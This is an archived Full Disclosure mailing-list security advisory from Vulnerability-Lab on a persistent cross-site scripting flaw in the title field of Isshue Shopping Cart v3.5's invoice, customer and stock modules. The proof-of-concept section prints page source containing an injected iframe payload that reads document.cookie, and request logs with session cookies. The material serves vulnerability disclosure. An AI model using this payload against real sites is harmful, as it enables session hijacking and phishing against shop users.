[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
From:       "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date:       2021-10-27 12:06:59
Message-ID: 5b895d1a-a90c-adbd-8793-ecd6a93c4c63 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284


Release Date:
=============
2021-10-22


Vulnerability Laboratory ID (VL-ID):
====================================
2284


Common Vulnerability Scoring System:
====================================
5.1


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business \
management. It is all in one package for website management with backend admin panel to manage \
inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it \
through one-time payment now. Your eCommerce business frequently changes with the times. All \
you need is a system that will make your work easier and time-saving. You need the best \
eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a \
completely secure and fast eCommerce POS system for eCommerce solutions. Isshue is the best \
choice for any type of e-commerce business, big or small.

(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation \
vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.


Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
Medium User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue \
eCommerce Shopping Cart v3.5 web-application. The vulnerability allows remote attackers to \
inject own malicious script codes with persistent attack vector to compromise browser to \
web-application requests from the application-side.

A input validation web vulnerability has been discovered in the title input fields in `new \
invoice`, `customer` & `stock` modules. The `title` input and parameter allows to inject own \
malicious script code with persistent attack vector. The content of the input and parameter is \
insecure validated, thus allows remote attackers with privileged user accounts \
(manager/keeper/admin) to inject own malformed script code that executes on preview. The \
request method to inject is post and the attack vector is persistent on the application-side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing \
attacks, persistent external redirects to malicious source and persistent manipulation of \
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Title

Vulnerable Input(s):
[+] Title

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] stock
[+] customer
[+] invoice


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with \
keeper account and with low user interaction. For security demonstration or to reproduce the \
persistent cross site web vulnerability follow the provided information and steps below to \
continue.


Vulnerable Source:
<div class="row">
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" \
data-lobipanel-child-inner-id="azO1Fsrq9M"> <div class="panel panel-bd lobidrag lobipanel \
lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0"> <div class="panel-heading \
ui-sortable-handle"> <div class="panel-title" style="max-width: calc(100% - \
180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" \
onload="alert(document.cookie)"></iframe></div> <div class="dropdown"><ul class="dropdown-menu \
dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title" \
data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" \
title=""><i class="panel-control-icon ti-pencil"></i> <span class="control-title">Edit \
title</span></a></li><li> <a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" \
data-title="Unpin" data-placement="bottom" data-original-title="" title=""> <i \
class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li> <a \
data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" \
data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon \
ti-reload"></i><span class="control-title">Reload</span></a></li><li> <a data-func="minimize" \
data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" \
data-original-title="" title=""> <i class="panel-control-icon ti-minus"></i><span \
class="control-title">Minimize</span></a></li><li><a data-func="expand" \
data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" \
data-original-title="" title=""> <i class="panel-control-icon ti-fullscreen"></i><span \
class="control-title">Fullscreen</span></a></li><li> <a data-func="close" data-tooltip="Close" \
data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" \
title=""> <i class="panel-control-icon ti-close"></i><span \
class="control-title">Close</span></a></li></ul> <div class="dropdown-toggle" \
data-toggle="dropdown"><span class="panel-control-icon glyphicon \
glyphicon-cog"></span></div></div></div> <form \
action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" \
class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" \
method="post" accept-charset="utf-8" novalidate="novalidate"> <div class="panel-body">
<div class="row">
<div class="col-sm-8" id="payment_from_1">
<div class="form-group row">
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i \
class="text-danger">*</i></label> <div class="col-sm-6">
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection \
form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" \
autocomplete="off"> <input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" \
class="customer_hidden_value" type="hidden" name="customer_id"> </div>


--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; \
bm=29207327be4562a93104e7c7c2e62fe74d7d12de- \
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
                
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; \
bm=29207327be4562a93104e7c7c2e62fe74d7d12de- \
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; \
GMT; Max-Age=7200; path=/


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopping cart \
web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - \
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com \
                infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php \
                vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  \
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.

				    Copyright  © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢

-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic